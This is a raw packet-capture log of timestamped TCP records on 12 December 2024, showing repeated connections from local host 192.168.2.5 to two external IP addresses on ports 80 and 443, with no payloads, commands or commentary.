                                                                        Dec 12, 2024 21:39:48.736116886 CET4987380192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:48.856026888 CET8049873193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:50.005392075 CET8049873193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:50.015532017 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:50.015568018 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:50.015650034 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:50.016283989 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:50.016298056 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:50.053162098 CET4987380192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:51.400768042 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.400909901 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.402259111 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.402265072 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.402472973 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.403631926 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.403661013 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.403844118 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.403872013 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.403963089 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.403995991 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.404087067 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404122114 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.404211998 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404222012 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.404244900 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404251099 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.404256105 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404267073 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.404316902 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404325962 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.404335976 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404340982 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.404354095 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404360056 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.404370070 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404375076 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.404383898 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404383898 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404391050 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.404412031 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404412031 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404417992 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.404427052 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.404434919 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404443979 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.404455900 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404460907 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.404494047 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404500008 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.404515982 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404530048 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.404542923 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404547930 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.404552937 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404557943 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.404567957 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404572010 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.404599905 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404607058 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.404620886 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404625893 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.404638052 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404644012 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404656887 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404695034 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404707909 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404719114 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404733896 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404747963 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404757023 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404792070 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404807091 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.404853106 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.451329947 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.451539040 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.451560974 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.451577902 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.451585054 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.451625109 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.451632023 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.451684952 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.451694965 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.451735020 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.451744080 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.451785088 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.451791048 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.451828957 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.451838017 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.451884031 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.451894045 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.451903105 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.451906919 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:51.451924086 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.451963902 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:51.495337009 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:53.012161016 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:53.012176991 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:53.012291908 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:53.012314081 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:53.012717962 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:53.012762070 CET44349877149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:53.012846947 CET49877443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:53.082406044 CET4987380192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:53.083255053 CET4988580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:53.202610970 CET8049873193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:53.202847958 CET4987380192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:53.203016043 CET8049885193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:53.203243017 CET4988580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:53.203391075 CET4988580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:53.323111057 CET8049885193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:54.472074986 CET8049885193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:54.480881929 CET4988580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:54.481232882 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:54.481272936 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:54.482883930 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:54.483405113 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:54.483418941 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:54.600864887 CET8049885193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:54.601131916 CET4988580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:55.915993929 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.916089058 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.917507887 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.917519093 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.917882919 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.919121027 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.919190884 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.919275999 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.919300079 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.922921896 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.922959089 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.923125029 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.923156023 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.926964998 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.926980019 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.927006006 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927021980 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927037954 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.927048922 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.927092075 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927113056 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.927114964 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927125931 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.927182913 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927196980 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.927241087 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927263021 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.927310944 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927330017 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.927345037 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927352905 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.927369118 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927383900 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.927407026 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927414894 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.927431107 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927443981 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.927457094 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927462101 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.927478075 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927488089 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.927546024 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927556038 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.927572966 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927581072 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.927594900 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927603006 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.927624941 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927632093 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.927675962 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927725077 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927748919 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927764893 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927804947 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927824020 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927865982 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927872896 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927891970 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.927936077 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.975389957 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.979003906 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.979015112 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.979074955 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.979085922 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.979099989 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.979106903 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.979124069 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.979130983 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.979146004 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.979155064 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.979176998 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.979183912 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.979192019 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.979197979 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.979203939 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.979209900 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.979221106 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.979231119 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:55.979249001 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:55.979259968 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:56.019372940 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:57.557883024 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:57.557909966 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:57.557990074 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:57.558013916 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:57.558068037 CET44349889149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:57.558118105 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:57.558522940 CET49889443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:57.638171911 CET4989780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:58.107398033 CET8049897193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:58.107476950 CET4989780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:58.107630014 CET4989780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:58.227333069 CET8049897193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:59.374314070 CET8049897193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:59.383200884 CET4989780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:59.383572102 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:59.383610010 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:59.386045933 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:59.386357069 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:59.386373997 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:59.503381968 CET8049897193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:59.503441095 CET4989780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:00.840049982 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.841700077 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.841727972 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.842107058 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.842130899 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.842305899 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.842324972 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.842567921 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.842597961 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.842818022 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.842837095 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.842853069 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.842859030 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.843106985 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.843127012 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.843142986 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.843153000 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.843166113 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.843173981 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.843458891 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.843494892 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.843514919 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.843514919 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.843528986 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.843539000 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.843544960 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.843550920 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.843564034 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.843574047 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.843585014 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.843601942 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.843619108 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.843628883 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.843697071 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.843708038 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.843724966 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.843733072 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.843750000 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.843763113 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.843771935 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.843780994 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.843810081 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.843818903 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.843828917 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.843835115 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.843848944 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.843856096 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.843873024 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.843882084 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.843920946 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.843950033 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.843966961 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.843976021 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.843993902 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.844002008 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.844008923 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.844018936 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.844023943 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.844028950 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.844046116 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.844053030 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.844060898 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.844067097 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:00.844085932 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.844099045 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.844150066 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.844171047 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.844213009 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.844223022 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.844244957 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.844281912 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.844301939 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.844341993 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.844371080 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:00.891324997 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:02.511185884 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:02.511225939 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:02.511414051 CET44349902149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:02.511527061 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:02.511919022 CET49902443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:02.758958101 CET4990880192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:02.878911018 CET8049908193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:02.880728960 CET4990880192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:02.880841017 CET4990880192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:03.001615047 CET8049908193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:08.637567043 CET8049908193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:08.647104979 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:08.647109032 CET4990880192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:08.647151947 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:08.647273064 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:08.647838116 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:08.647852898 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:08.767371893 CET8049908193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:08.767493010 CET4990880192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:10.008917093 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.083939075 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.083964109 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.084999084 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.085017920 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.085402966 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.085417032 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.085870981 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.085886955 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.085954905 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.085971117 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.086410999 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.086422920 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.086693048 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.086700916 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.088193893 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.088208914 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.088845015 CET49921443192.168.2.5149.154.167.220
